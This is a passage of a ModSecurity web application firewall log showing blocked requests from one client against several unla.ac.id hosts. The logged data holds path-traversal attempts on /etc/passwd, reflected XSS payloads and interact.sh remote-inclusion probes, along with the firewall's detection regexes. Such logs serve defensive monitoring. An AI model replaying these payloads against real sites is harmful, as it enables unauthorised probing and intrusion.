"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnepMsAAAAK"]
[Tue Aug 29 11:51:35.561131 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3lEAAAAM"]
[Tue Aug 29 11:51:35.582182 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnepMwAAAAK"]
[Tue Aug 29 11:51:35.603579 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnepM0AAAAK"]
[Tue Aug 29 11:51:35.606988 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@oAAAAI"]
[Tue Aug 29 11:51:35.613529 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnf3lMAAAAM"]
[Tue Aug 29 11:51:35.633261 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAhoHPMAAAAl"]
[Tue Aug 29 11:51:35.713503 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAm7nAcAAAAE"]
[Tue Aug 29 11:51:35.713919 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAnkwa4AAAAY"]
[Tue Aug 29 11:51:36.596814 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15WMCo-f0AAAnHQfkAAAAT"]
[Tue Aug 29 11:51:39.544580 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAlUlkwAAAA0"]
[Tue Aug 29 11:51:39.548619 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAngCUgAAAAP"]
[Tue Aug 29 11:51:39.569659 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAm80QsAAAAF"]
[Tue Aug 29 11:51:39.596131 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnkwbkAAAAY"]
[Tue Aug 29 11:51:39.666926 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnmT1kAAAAd"]
[Tue Aug 29 11:51:40.876271 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAmLPUsAAAAN"]
[Tue Aug 29 11:51:40.878167 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnHQgYAAAAT"]
[Tue Aug 29 11:51:40.888386 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAfWOG4AAAAL"]
[Tue Aug 29 11:51:40.893247 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAhoHQYAAAAl"]
[Tue Aug 29 11:51:40.900112 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15XMCo-f0AAAmLPUwAAAAN"]
[Tue Aug 29 11:51:40.909172 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnmT1sAAAAd"]
[Tue Aug 29 11:51:41.612153 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XcCo-f0AAAnd2-8AAAAI"]
[Tue Aug 29 11:51:42.548364 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAmLPU8AAAAN"]
[Tue Aug 29 11:51:42.588648 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAngCU8AAAAP"]
[Tue Aug 29 11:51:42.604445 2023] [:error] [pid 2520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnYkj0AAAAD"]
[Tue Aug 29 11:51:42.631106 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAjdQXAAAAAZ"]
[Tue Aug 29 11:51:42.642187 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAngCVEAAAAP"]
[Tue Aug 29 11:51:43.641712 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15X8Co-f0AAAnn19MAAAAe"]
